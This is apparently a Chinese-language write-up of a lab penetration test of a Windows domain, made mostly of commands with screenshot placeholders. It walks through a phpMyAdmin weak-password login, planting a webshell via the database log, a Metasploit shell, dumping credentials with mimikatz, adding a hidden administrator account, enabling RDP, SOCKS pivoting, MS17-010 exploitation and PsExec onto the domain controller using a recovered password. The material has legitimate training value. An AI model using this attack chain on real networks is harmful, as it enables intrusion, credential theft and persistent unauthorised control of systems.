外网

扫到如下端口
2024-08-12T05:31:36.png
扫目录发现phpmyadmin
2024-08-12T05:36:53.png
访问ChangeLog得到版本是3.5.8.2
2024-08-12T05:42:07.png
直接弱密码登录
2024-08-12T05:38:37.png
可以看到网站的根目录
2024-08-12T05:59:26.png
通过更改数据库的日志文件为php后缀来getshell
2024-08-12T06:03:50.png
2024-08-12T06:01:39.png
2024-08-12T06:06:17.png

内网

信息收集

systeminfo
echo %PROCESSOR_ARCHITECTURE% #要在cmd运行
net user                                #查看本地用户 /domain就是域用户
net localgroup administrators           #查看管理员组(通常包含域用户)
net config workstation     # 查看当前计算机名,全名,用户名,系统版本,工作站域,登陆的域等
net view /domain              # 查看域
net time /domain           # 主域服务器会同时作为时间服务器
net user /domain      # 查看域用户
net group /domain     # 查看域内用户组列表
net group "domain computers" /domain      #查看域内的机器
net group "domain controllers" /domain          #查看域控制器组
net group "Enterprise Admins" /domain    #查看域管理员组

获取系统权限

通过msf反弹shell
2024-08-12T06:18:21.png
shell可能乱码,chcp 65001可以解决
2024-08-12T06:22:40.png

获取账号密码

mimikatz.exe

log
privilege::debug
sekurlsa::logonpasswords

2024-08-12T06:38:18.png

kiwi

load kiwi
help kiwi
creds_all

2024-08-12T06:44:52.png

远程桌面连接

vnc

run vnc
2024-08-13T02:03:31.png

rdp

run post/windows/manage/enable_rdp  #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=oldboy PASSWORD=123456 #添加用户,默认会添加到管理员组,但是太简单的密码可能因为安全问题无法设置,要尽量复杂
net user hacker Ch3Ch2oh /add
net localgroup administrators hacker /add #添加管理员权限
net user # 查询用户
rdesktop 192.168.1.107
xfreerdp /v:<server_address> /u:<username> /tls-seclevel:0 #/p:<password> 可选

2024-08-13T02:57:15.png

搭建代理

ew

ew.exe -s ssocksd -l 8888
proxychains4 -f /etc/proxychains4.conf bash

成功通过内网的ip访问到web服务,socks代理是TCP/IP协议的,所以用icmp协议的ping是不通的。
2024-08-12T12:16:13.png

msf

run autoroute -s 192.168.52.0/24
run autoroute -p
#退出反弹shell的session
background
use auxiliary/server/socks_proxy
run
sessions
sessions -i ID

2024-08-12T12:31:15.png
这个是反向的socks连接,所以socks服务器是kali,socks5 127.0.0.1 1080
2024-08-12T12:50:33.png

内网主机端口扫描

msf

run post/windows/gather/arp_scanner rhosts=192.168.52.0/24
2024-08-13T11:56:46.png
run post/windows/gather/enum_applications
2024-08-13T11:58:34.png

cmd

查询域内所有客户端主机
net group "Domain Computers" /domain
2024-08-13T03:11:21.png

fscan

./fscan -h 192.168.52.141 -socks5 127.0.0.1:1080
fscan本身提供了socks代理的功能
2024-08-12T13:18:10.png

nmap

nmap -sT -Pn 192.168.52.141
2024-08-13T10:03:09.png

第二台主机

因为fscan扫出了ms17-010,先用msf探测一下
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.52.141
run
2024-08-13T10:13:03.png
然后我们来远程连接这个主机

use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.141
set command whoami
run
set command net user hacker Ch3Ch2oh /add
run
set command net localgroup administrators hacker /add
run
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' #开启3389端口
run
rdesktop 192.168.52.141

2024-08-13T10:31:30.png
本来想弄个正向shell的,但是防火墙关不掉(netsh advfirewall set allprofiles state off #用netsh关闭防火墙)
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set lport 5555
set rhosts 192.168.52.141

DC

根据之前获取到的用户和密码通过PsExec进行连接,注意这里要用正向shell

use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass Mac123456
set payload windows/meterpreter/bind_tcp
run

2024-08-13T12:09:45.png